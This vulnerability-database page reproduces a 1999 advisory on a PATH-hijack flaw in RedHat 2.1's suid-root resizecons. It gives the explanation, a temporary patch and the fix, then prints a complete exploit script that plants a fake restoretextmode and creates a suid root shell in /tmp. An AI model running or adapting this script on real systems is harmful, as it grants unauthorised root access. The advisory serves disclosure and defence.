Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

resizecons.sh

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

Security flaw in RedHat 2.1 allows arbitrary root command execution via resizecons program.

Code
` There is a security hole in RedHat 2.1, which installs the program  
/usr/bin/resizecons suid root. The resizecons program allows a user  
to change the videmode of the console. During this process, it runs  
the program restoretextmode without an absolute pathname, assuming the  
correct version will be found in the path, while running with root  
privileges. It then executes setfont in the same manner. By setting  
the path to find a rogue restoretextmode, a user can execute an arbitrary  
program as root.  
As a more amusing aside, the file /tmp/selection.pid is read and the  
pid contained within is sent a SIGWINCH, allowing a user on the system  
to force a redraw of the screen to an arbitrary process (that handles   
SIGWINCH calls) on the machine.   
If /usr/bin/resizecons needs to be run by users other than root at the  
console, provisions need to be made in the code to execute the outside  
utilities with absolute pathnames, and to check access rights on files  
before opening.  
  
Program: /usr/bin/resizecons  
Affected Operating Systems: Red Hat 2.1 linux distribution  
Requirements: account on system  
Temporary Patch: chmod -s /usr/bin/resizecons  
Security Compromise: root  
Author: Dave M. ([email protected])  
Synopsis: resizecons runs restoretextmode without an  
absolute pathname while executing as root,  
allowing a user to substitute the real  
program with arbitrary commands.  
  
Exploit:  
  
wozzeck.sh:  
#!/bin/sh  
#  
# wozzeck.sh  
# exploits a security hole in /usr/bin/resizecons   
# to create a suid root shell in /tmp/wozz on a   
# linux Red Hat 2.1 system.  
#  
# by Dave M. ([email protected])  
#   
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system  
echo ================ Checking system vulnerability  
if test -u /usr/bin/resizecons  
then  
echo ++++++++++++++++ System appears vulnerable.  
cd /tmp  
cat << _EOF_ > /tmp/313x37  
This exploit is dedicated to   
Wozz. Use it with care.  
_EOF_  
cat << _EOF_ > /tmp/restoretextmode  
#!/bin/sh  
/bin/cp /bin/sh /tmp/wozz  
/bin/chmod 4777 /tmp/wozz  
_EOF_  
/bin/chmod +x /tmp/restoretextmode  
PATH=/tmp  
echo ================ Executing resizecons  
/usr/bin/resizecons 313x37  
/bin/rm /tmp/restoretextmode  
/bin/rm /tmp/313x37  
if test -u /tmp/wozz  
then  
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz  
else  
echo ---------------- Exploit failed  
fi  
else  
echo ---------------- This machine does not appear to be vulnerable.  
fi  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
security holeredhat 2.1resizecons programarbitrary commandsroot privilegespath exploitationtemporary patch
17